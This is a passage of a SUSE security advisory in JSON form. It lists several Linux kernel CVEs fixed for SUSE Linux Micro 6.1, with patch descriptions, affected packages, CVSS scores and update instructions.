"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40274"
},
{
"cve": "CVE-2025-40275",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40275"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix NULL pointer dereference in snd_usb_mixer_controls_badd\n\nIn snd_usb_create_streams(), for UAC version 3 devices, the Interface\nAssociation Descriptor (IAD) is retrieved via usb_ifnum_to_if(). If this\ncall fails, a fallback routine attempts to obtain the IAD from the next\ninterface and sets a BADD profile. However, snd_usb_mixer_controls_badd()\nassumes that the IAD retrieved from usb_ifnum_to_if() is always valid,\nwithout performing a NULL check. This can lead to a NULL pointer\ndereference when usb_ifnum_to_if() fails to find the interface descriptor.\n\nThis patch adds a NULL pointer check after calling usb_ifnum_to_if() in\nsnd_usb_mixer_controls_badd() to prevent the dereference.\n\nThis issue was discovered by syzkaller, which triggered the bug by sending\na crafted USB device descriptor.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40275",
"url": "https://www.suse.com/security/cve/CVE-2025-40275"
},
{
"category": "external",
"summary": "SUSE Bug 1254829 for CVE-2025-40275",
"url": "https://bugzilla.suse.com/1254829"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40275"
},
{
"cve": "CVE-2025-40277",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40277"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vmwgfx: Validate command header size against SVGA_CMD_MAX_DATASIZE\n\nThis data originates from userspace and is used in buffer offset\ncalculations which could potentially overflow causing an out-of-bounds\naccess.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40277",
"url": "https://www.suse.com/security/cve/CVE-2025-40277"
},
{
"category": "external",
"summary": "SUSE Bug 1254894 for CVE-2025-40277",
"url": "https://bugzilla.suse.com/1254894"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40277"
},
{
"cve": "CVE-2025-40278",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40278"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak\n\nFix a KMSAN kernel-infoleak detected by the syzbot .\n\n[net?] KMSAN: kernel-infoleak in __skb_datagram_iter\n\nIn tcf_ife_dump(), the variable \u0027opt\u0027 was partially initialized using a\ndesignatied initializer. While the padding bytes are reamined\nuninitialized. nla_put() copies the entire structure into a\nnetlink message, these uninitialized bytes leaked to userspace.\n\nInitialize the structure with memset before assigning its fields\nto ensure all members and padding are cleared prior to beign copied.\n\nThis change silences the KMSAN report and prevents potential information\nleaks from the kernel memory.\n\nThis fix has been tested and validated by syzbot. This patch closes the\nbug reported at the following syzkaller link and ensures no infoleak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40278",
"url": "https://www.suse.com/security/cve/CVE-2025-40278"
},
{
"category": "external",
"summary": "SUSE Bug 1254825 for CVE-2025-40278",
"url": "https://bugzilla.suse.com/1254825"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40278"
},
{
"cve": "CVE-2025-40279",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40279"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sched: act_connmark: initialize struct tc_ife to fix kernel leak\n\nIn tcf_connmark_dump(), the variable \u0027opt\u0027 was partially initialized using a\ndesignatied initializer. While the padding bytes are reamined\nuninitialized. nla_put() copies the entire structure into a\nnetlink message, these uninitialized bytes leaked to userspace.\n\nInitialize the structure with memset before assigning its fields\nto ensure all members and padding are cleared prior to beign copied.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40279",
"url": "https://www.suse.com/security/cve/CVE-2025-40279"
},
{
"category": "external",
"summary": "SUSE Bug 1254846 for CVE-2025-40279",
"url": "https://bugzilla.suse.com/1254846"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40279"
},
{
"cve": "CVE-2025-40280",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40280"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: Fix use-after-free in tipc_mon_reinit_self().\n\nsyzbot reported use-after-free of tipc_net(net)-\u003emonitors[]\nin tipc_mon_reinit_self(). [0]\n\nThe array is protected by RTNL, but tipc_mon_reinit_self()\niterates over it without RTNL.\n\ntipc_mon_reinit_self() is called from tipc_net_finalize(),\nwhich is always under RTNL except for tipc_net_finalize_work().\n\nLet\u0027s hold RTNL in tipc_net_finalize_work().\n\n[0]:\nBUG: KASAN: slab-use-after-free in __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline]\nBUG: KASAN: slab-use-after-free in _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162\nRead of size 1 at addr ffff88805eae1030 by task kworker/0:7/5989\n\nCPU: 0 UID: 0 PID: 5989 Comm: kworker/0:7 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025\nWorkqueue: events tipc_net_finalize_work\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __kasan_check_byte+0x2a/0x40 mm/kasan/common.c:568\n kasan_check_byte include/linux/kasan.h:399 [inline]\n lock_acquire+0x8d/0x360 kernel/locking/lockdep.c:5842\n __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline]\n _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162\n rtlock_slowlock kernel/locking/rtmutex.c:1894 [inline]\n rwbase_rtmutex_lock_state kernel/locking/spinlock_rt.c:160 [inline]\n rwbase_write_lock+0xd3/0x7e0 kernel/locking/rwbase_rt.c:244\n rt_write_lock+0x76/0x110 kernel/locking/spinlock_rt.c:243\n write_lock_bh include/linux/rwlock_rt.h:99 [inline]\n tipc_mon_reinit_self+0x79/0x430 net/tipc/monitor.c:718\n tipc_net_finalize+0x115/0x190 net/tipc/net.c:140\n process_one_work kernel/workqueue.c:3236 [inline]\n process_scheduled_works+0xade/0x17b0 kernel/workqueue.c:3319\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3400\n kthread+0x70e/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x439/0x7d0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 6089:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:68\n poison_kmalloc_redzone mm/kasan/common.c:388 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:405\n kasan_kmalloc include/linux/kasan.h:260 [inline]\n __kmalloc_cache_noprof+0x1a8/0x320 mm/slub.c:4407\n kmalloc_noprof include/linux/slab.h:905 [inline]\n kzalloc_noprof include/linux/slab.h:1039 [inline]\n tipc_mon_create+0xc3/0x4d0 net/tipc/monitor.c:657\n tipc_enable_bearer net/tipc/bearer.c:357 [inline]\n __tipc_nl_bearer_enable+0xe16/0x13f0 net/tipc/bearer.c:1047\n __tipc_nl_compat_doit net/tipc/netlink_compat.c:371 [inline]\n tipc_nl_compat_doit+0x3bc/0x5f0 net/tipc/netlink_compat.c:393\n tipc_nl_compat_handle net/tipc/netlink_compat.c:-1 [inline]\n tipc_nl_compat_recv+0x83c/0xbe0 net/tipc/netlink_compat.c:1321\n genl_family_rcv_msg_doit+0x215/0x300 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x60e/0x790 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x208/0x470 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x846/0xa10 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x805/0xb30 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 [inline]\n __sock_sendmsg+0x21c/0x270 net/socket.c:729\n ____sys_sendmsg+0x508/0x820 net/socket.c:2614\n ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668\n __sys_sendmsg net/socket.c:2700 [inline]\n __do_sys_sendmsg net/socket.c:2705 [inline]\n __se_sys_sendmsg net/socket.c:2703 [inline]\n __x64_sys_sendmsg+0x1a1/0x260 net/socket.c:2703\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0x3b0 arch/\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
